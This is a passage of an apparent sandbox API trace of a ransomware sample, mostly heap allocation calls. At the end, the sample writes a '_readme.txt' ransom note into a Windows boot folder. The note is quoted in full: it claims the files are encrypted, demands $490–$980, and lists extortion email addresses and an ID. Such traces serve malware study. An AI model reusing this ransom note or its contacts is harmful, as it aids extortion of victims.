out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.984] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.984] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.984] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.984] PathFindFileNameW (pszPath="") returned="" [0090.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.984] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.985] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.985] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.985] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0090.985] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0090.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.986] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0090.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.986] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.986] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.986] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.987] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.987] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.988] CloseHandle (hObject=0x5cc) returned 1 [0090.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.988] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.988] FindFirstFileW 